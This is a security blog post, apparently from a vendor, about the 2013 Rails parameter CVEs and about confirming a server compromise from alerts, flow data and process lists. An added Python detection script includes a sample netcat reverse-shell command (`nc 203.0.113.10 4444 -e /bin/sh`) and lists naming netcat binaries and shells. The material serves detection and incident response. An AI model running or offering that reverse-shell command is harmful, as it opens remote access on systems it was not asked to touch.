The last few weeks have been rough on Rails developers. Several vulnerabilities involving the parsing of Rails parameters have been disclosed, with one leading to arbitrary code execution (CVE-2013-0155 and CVE-2013-0156). Our friend Postmodern, the creator of Ronin (an excellent Ruby platform for vulnerability and exploit development), wrote a great blog post explaining the vulnerabilities, with working PoC code.
If you believe you have a vulnerable Rails application, please visit the Rails blog and follow their mitigation instructions.
To assist our users, the Snorby Cloud team has issued detection signatures to our customers for the vulnerabilities described in the CVEs. You can see these new rules (appended with [SC]) in the screenshot below.
The reason I love Snorby Cloud is that it not only shows us the event notification, it also gives us the tools we need to confirm a compromise. Let’s see how it works.
First we click into an interesting alert.
If we look at the flow data, we can see the attacker attempted to create a basic reverse shell using netcat.
We can confirm the box was compromised in two ways:
First, we can see network traffic for all of the attacker’s commands to the victim computer.
Second, we can see netcat running with a shell in the victim computer’s process list.
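The two checks above (outbound flows from the web server to an outside host, and a netcat process that was handed a shell) can be scripted against exported data as well. The following is an added example, not code from the original post or from Snorby Cloud; it runs over a constructed `ps aux` snapshot and a constructed list of flow records, using documentation IP ranges, and correlates the two sources the same way the walkthrough does by hand. The internal network, the allowed egress ports and the sample data are all assumptions for the demonstration.

```python
import ipaddress
import os
import re
from typing import Dict, List, Tuple

# Flow record: (src, sport, dst, dport, proto, bytes_out, bytes_in)
Flow = Tuple[str, int, str, int, str, int, int]

# Constructed `ps aux` snapshot of the victim web server (sample data, not from the post's screenshots).
PS_SAMPLE = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  24444  2304 ?        Ss   10:01   0:00 /sbin/init
rails     1422  0.3  2.1 311232 43120 ?        Sl   10:02   0:05 unicorn worker[0] -c config/unicorn.rb
rails     1987  0.0  0.0  11324   932 ?        S    10:17   0:00 nc 203.0.113.10 4444 -e /bin/sh
rails     1988  0.0  0.0   4508   768 ?        S    10:17   0:00 /bin/sh
postgres   812  0.0  1.0  98120 20120 ?        S    10:01   0:00 postgres: writer process
"""

# Constructed flow records seen from the web server 192.0.2.5 (sample data).
FLOWS: List[Flow] = [
    ("192.0.2.5", 80,    "198.51.100.7", 51234, "tcp", 4810, 2210),  # ordinary HTTP response
    ("192.0.2.5", 41022, "203.0.113.10", 4444,  "tcp", 1330, 620),   # server-initiated, outside host
    ("192.0.2.5", 50110, "192.0.2.20",   5432,  "tcp", 2100, 9800),  # database traffic, stays internal
]

# Assumed policy: a web server legitimately opens outbound connections only to these ports.
ALLOWED_EGRESS_PORTS = {53, 80, 443}
NC_BINARIES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_ps(ps_text: str) -> List[Dict]:
    """Turn `ps aux` output into rows; the COMMAND column keeps its spaces."""
    rows = []
    for line in ps_text.strip().splitlines()[1:]:  # skip the header line
        fields = line.split(None, 10)  # 10 fixed columns, then the full command line
        if len(fields) < 11:
            continue
        rows.append({"user": fields[0], "pid": int(fields[1]), "cmd": fields[10]})
    return rows


def find_netcat_shells(ps_text: str) -> List[Dict]:
    """Flag netcat processes whose arguments name a shell (the 'netcat with a shell' check)."""
    hits = []
    for row in parse_ps(ps_text):
        argv = row["cmd"].split()
        if not argv:
            continue
        binary = os.path.basename(argv[0])
        if binary in NC_BINARIES and any(os.path.basename(a) in SHELLS for a in argv[1:]):
            hits.append(row)
    return hits


def find_outbound_external(flows: List[Flow], internal_net: str) -> List[Flow]:
    """Flag connections the internal host initiated (ephemeral source port) to an outside address."""
    net = ipaddress.ip_network(internal_net)
    hits = []
    for flow in flows:
        src, sport, dst, dport = flow[0], flow[1], flow[2], flow[3]
        src_internal = ipaddress.ip_address(src) in net
        dst_internal = ipaddress.ip_address(dst) in net
        if src_internal and not dst_internal and sport >= 1024 and dport not in ALLOWED_EGRESS_PORTS:
            hits.append(flow)
    return hits


def confirm_compromise(ps_text: str, flows: List[Flow], internal_net: str) -> List[Dict]:
    """Correlate both sources: a netcat shell process whose command line names the peer of a suspicious flow."""
    peers = {(f[2], f[3]) for f in find_outbound_external(flows, internal_net)}
    confirmed = []
    for proc in find_netcat_shells(ps_text):
        ports = {int(tok) for tok in proc["cmd"].split() if tok.isdigit()}
        for ip in IP_RE.findall(proc["cmd"]):
            for dst, dport in peers:
                if dst == ip and dport in ports:
                    confirmed.append({"pid": proc["pid"], "user": proc["user"],
                                      "peer": f"{dst}:{dport}", "cmd": proc["cmd"]})
    return confirmed


if __name__ == "__main__":
    for hit in confirm_compromise(PS_SAMPLE, FLOWS, "192.0.2.0/24"):
        print(f"confirmed: pid {hit['pid']} ({hit['user']}) -> {hit['peer']}: {hit['cmd']}")
```

On the sample data this reports PID 1987 talking to 203.0.113.10:4444. Either source alone is only a lead: an outbound flow on an odd port may be a legitimate service, and a netcat process may belong to an admin; the correlation of the two is what turns an alert into a confirmed compromise, which is exactly the pivot the screenshots walk through.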
What I love about this is that we didn’t have to leave the Snorby Cloud UI a single time in order to pivot to all of these different data sources and successfully confirm a compromise.